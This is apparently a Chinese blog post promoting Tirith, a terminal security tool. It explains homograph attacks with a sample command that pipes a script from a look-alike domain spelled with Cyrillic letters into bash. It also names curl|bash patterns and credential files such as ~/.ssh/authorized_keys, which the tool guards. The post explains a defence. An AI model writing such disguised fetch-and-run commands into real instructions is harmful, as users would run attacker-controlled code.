终端里的“守护者”：Tirith —— 彻底根除同形攻击与恶意指令注入

作为一名开发者，我们的日常几乎离不开终端。从 GitHub 复制一段 curl 指令，或者在 Stack Overflow 拷贝一行 docker 配置。你是否曾想过，这些看起来人畜无害的字符背后，可能隐藏着足以摧毁你服务器的“赛博病毒”？

今天，我想安利一个能救命的开源项目 —— **Tirith**。

---

😱 致命的“像素级”骗局

请睁大眼睛，看看下面这两行代码有什么不同？

# Line A (Safe)
curl -sSL https://install.example-cli.dev | bash 

# Line B (Compromised)
curl -sSL https://іnstall.example-clі.dev | bash

答案是： 没有任何区别。至少对你的肉眼和默认终端配置来说是这样的。

但真相是： Line B 中的字母 і 并不是英语字母，而是 **西里尔字母 (U+0456)**。它会引导你的 curl 请求访问一个完全由攻击者控制的伪造域名。

如果你按下回车，你执行的不再是安装脚本，而是攻击者的恶意 Payload。浏览器在几年前就解决了这个问题，但我们的终端（Terminal）至今依然是“不设防”的。

---

🛡️ Tirith：终端世界的“米纳斯提里斯”

Tirith 取名自《指环王》中的刚铎都城，意为“守护者”。它是一个极轻量、零延迟的命令行安全网关，旨在通过自动化扫描拦截这些肉眼不可见的危险。

🚀 它的核心能力：

1. 同形攻击防御 (Homograph Defense)
   自动检测指令中包含的非 ASCII 同形字符，一旦发现恶意混淆，立即在执行前强行拦截。

2. ANSI 转义注入防护
   防止恶意代码利用 ANSI 转义序列清空终端显示或篡改执行结果。

3. 管道指令安全预警
   针对 curl | bash 或 wget | sh 这种“危险模式”，Tirith 会强制弹出 Warning，要求你二次确认。

4. 关键配置文件锁定
   任何试图修改 ~/.ssh/authorized_keys、~/.bashrc 或 ~/.gitconfig 的可疑行为，都会被 Tirith 锁定并阻断。

---

🔥 深度体验：为什么它是装机必备？

• 性能近乎原生：基于 Rust 的极简设计，扫描耗时通常小于 1 毫秒，你完全感受不到性能损耗。
• 完全本地化：零数据外泄！所有分析都在你本地机器上完成，不需要任何 API Key。
• 全平台兼容：完美支持 zsh, bash, fish 以及 Windows 上的 PowerShell。

---

🛠️ 三秒开启“神装”模式

使用 npm 一键安装：

npm install -g tirith && eval "$(tirith init)"

macOS 玩家专属：

brew install sheeki03/tap/tirith && eval "$(tirith init)"

---

💡 结语

在这个“代码一把梭”的时代，多一份防范就少一分灾难。Tirith 不是在限制你的自由，它是在你打算“赛博自杀”的时候，帮你拉了一把。

强烈建议每一位拥有生产服务器或重度依赖终端的同学装上它。

---

转载请注明出处：boaom.github.io